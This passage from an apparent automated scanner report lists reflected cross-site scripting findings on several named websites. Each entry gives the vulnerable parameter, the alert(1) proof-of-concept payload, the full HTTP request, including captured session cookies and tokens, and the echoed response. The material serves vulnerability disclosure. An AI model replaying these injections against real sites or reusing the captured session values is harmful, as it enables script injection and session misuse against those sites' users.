Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Feb 2011 20:42:18 GMT
Connection: keep-alive
Content-Length: 856

{"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment
...[SNIP]...
Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6", "nick": "visitor:210780399", "host": "lc03.zopim.com", "chat": {"members": [], "history": []}, "sid": "dFAqD1Ku9sANzup4iVjoZlanIFmiEk6o8QAQLwDi", "evt": 0, "email": ""}
3.46. http://lfov.net/webrecorder/g/chimera.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Issue detail

The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload a35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 was submitted in the vid parameter. This input was echoed as a35d3<img src=a onerror=alert(1)>e181c272a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /webrecorder/g/chimera.js?vid=nulla35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="nulla35d3<img src=a onerror=alert(1)>e181c272a5"; Expires=Sun, 26-Feb-2012 23:20:13 GMT
Content-Length: 62
Date: Sat, 26 Feb 2011 23:20:13 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='nulla35d3<img src=a onerror=alert(1)>e181c272a5';

3.47. http://odb.outbrain.com/utils/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c68ad<script>alert(1)</script>2366c191886 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F08%2F07%2Ffinal-pictures-from-duncannon-pa%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.05641490779817104&sig=RKWTKL3v HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298762384782; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: _lvd2=p47tkLgO+tfGFc5yucapKUbdFkigiXwa; Domain=outbrain.com; Expires=Sat, 05-Mar-2011 12:07:44 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: recs-74e9af2a662553ecf44292c20c4860dc=MvvIA5NJ5MbSeIuLhJLcUx6zCEztQUccKNVKISEnv3I+5qyasF+vvXwOWIXEdmAo; Domain=outbrain.com; Expires=Sat, 26-Feb-2011 23:24:44 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:19:44 GMT
Content-Length: 2920

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'183663854','req_id':'090d60a89850a65f1f1aea8c35cf961d'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','timeCounter':'0|10000|0','defaultRecNumber':4}}},0)c68ad<script>alert(1)</script>2366c191886
3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94384-->4321560c01e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /DRHM/store?Action=DisplayProductInterstitialDetailsPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&productID=103591500&94384-->4321560c01e=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280341872,0)
Date: Sun, 27 Feb 2011 17:47:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 14076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911800&StyleVersion=3&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ProductInterstitialDetailsPage
...[SNIP]...
3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 741fc-->4ffb80c87d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage&741fc-->4ffb80c87d5=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525015766,0)
Date: Sun, 27 Feb 2011 17:47:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 101351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=QuickBuyCartPage"-->
...[SNIP]...
3.50. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 12603<script>alert(1)</script>368df4f71e6 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/classics/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 27 Feb 2011 02:33:09 GMT
Via: NS-CACHE: 100
Etag: "d22d498f927e3a9e446e0238dde9829118d3ff60"
Content-Length: 116
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 27 Feb 2011 02:43:08 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6", "diggs": 0});
3.51. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887e2"><script>alert(1)</script>3846485b49a was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tn6mr2tkpge0hm9j073mo3abd6; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a">
...[SNIP]...
3.52. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31949"><script>alert(1)</script>6472702855d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tf092k3rbif117di4fkh2tgt53; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...
3.53. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4664"><script>alert(1)</script>215d5cf1a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1 HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=56tm98dg8f04is4dfv793tcde1; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1">
...[SNIP]...
3.54. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Issue detail

The value of the track request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8831c"><script>alert(1)</script>0aa3cd70274 was submitted in the track parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=cbc0c1flt61g7ei5pts0ddp3v3; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...
3.55. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Issue detail

The value of the traffic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c411b"><script>alert(1)</script>5975ff9a4a8 was submitted in the traffic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=3csq33e05pn8tl46hm7ti7hj44; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...
3.56. http://www.linkedin.com/cws/share-count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /cws/share-count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload bf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef was submitted in the url parameter. This input was echoed as bf915<img src=a onerror=alert(1)>77ba82f09ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglishbf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:1083319264699442203"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8qHmbJnGz3ALaeEKNDhv6Mnph3zq5ejKEjY-bzJWaTAdnP_K27P2mp:1298773233:7ca8bc841c7b778fb2296ec1656d588ca5376bc7"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:32 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Set-Cookie: bcookie="v=1&b9beeacf-d5b5-4c7b-8122-9094af2abc48"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 27 Feb 2011 02:20:33 GMT
Content-Length: 151

IN.Tags.Share.handleCount({"count":0,"url":"http://www.project-syndicate.org/commentary/ashour1/Englishbf915<img src=a onerror=alert(1)>77ba82f09ef"});
3.57. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Issue detail

The value of the bean request parameter is copied into the HTML document as plain text between tags. The payload 7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff was submitted in the bean parameter. This input was echoed as 7e534<img src=a onerror=alert(1)>39d24d73cff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff&method=buildUtilityTweetHTML&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:29'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService7e534<img src=a onerror=alert(1)>39d24d73cff with method: buildUtilityTweetHTML is not accessible remotely via Ajax Proxy.
3.58. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379 was submitted in the method parameter. This input was echoed as 998c7<img src=a onerror=alert(1)>36e6591e379 in the application's response.

